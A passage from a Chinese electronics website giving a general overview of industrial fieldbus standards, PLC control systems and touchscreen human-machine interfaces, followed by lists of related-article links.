2)分立的工艺动作自动控制如汽车制造机器人、汽车,典型产品是Profibus—DP、CAN 3)多点控制如楼宇自动化,典型产品是LON Work、Profibus—FMS。 图6:PLC控制系统示意图 参考资料: 可编程逻辑控制器PLC使用方便,编程简单,性价比高,在现代工业中应用极广。本文为大家介绍了10个PLC实用案例设计方案。 触摸屏作为人机交互界面在一定程度上减少PLC的外部I/O点的使用以及减轻系统外部按钮开关的连线复杂程度,同时也提高了运行维护的方便性。随着工业现场对控制设备小型化、易操作化、智能化的要求的不断提高,基于PLC和触摸屏的交流变频调速系统的应用前景将非常广阔。的智能控制器设计 泛指人、机器之间建立连接的所有技术和手段,其中M可以是人(Man),也可以是机器(Machine),在现有的许多大型工程装备类行业,通常采用可编程逻辑控制器PLC作为设备的控制系统
pid控制相关文章:
电气符号相关文章:
电工基础相关文章:
西门子plc相关文章:
c语言相关文章:
数字通信相关文章:
pid控制器相关文章:
尘埃粒子计数器相关文章:
双绞线传输器相关文章:
分享给小伙伴们:
我来说两句……
最新技术贴
微信公众号二
微信公众号一
